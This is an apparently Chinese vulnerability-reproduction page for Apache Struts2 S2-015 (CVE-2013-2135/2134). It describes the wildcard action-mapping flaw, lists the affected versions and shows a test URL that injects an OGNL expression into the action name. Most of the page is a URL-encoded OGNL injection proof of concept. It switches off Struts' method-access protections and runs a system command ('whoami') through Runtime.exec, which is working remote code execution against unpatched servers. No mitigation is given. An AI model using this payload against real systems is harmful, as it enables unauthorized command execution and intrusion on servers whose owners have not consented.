(CVE-2013-2135)(CVE-2013-2134)s2-015
========================================
一、漏洞简介
————
基于通配符定义的动作映射,如果一个请求跟任何其他定义的操作不匹配,他将会匹配\*,并且请求的同操作名称的jsp文件
二、漏洞影响
————
2.0.0 – 2.3.14.2
三、复现过程
————
http://www.0-sec.org:8080/example/HelloWorld.action
==\>改成
http://www.0-sec.org:8080/example/%25%7B1%2B1%7D.action
图片.png
### poc
%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%29%2C%23q%7D.action
请登录后查看评论内容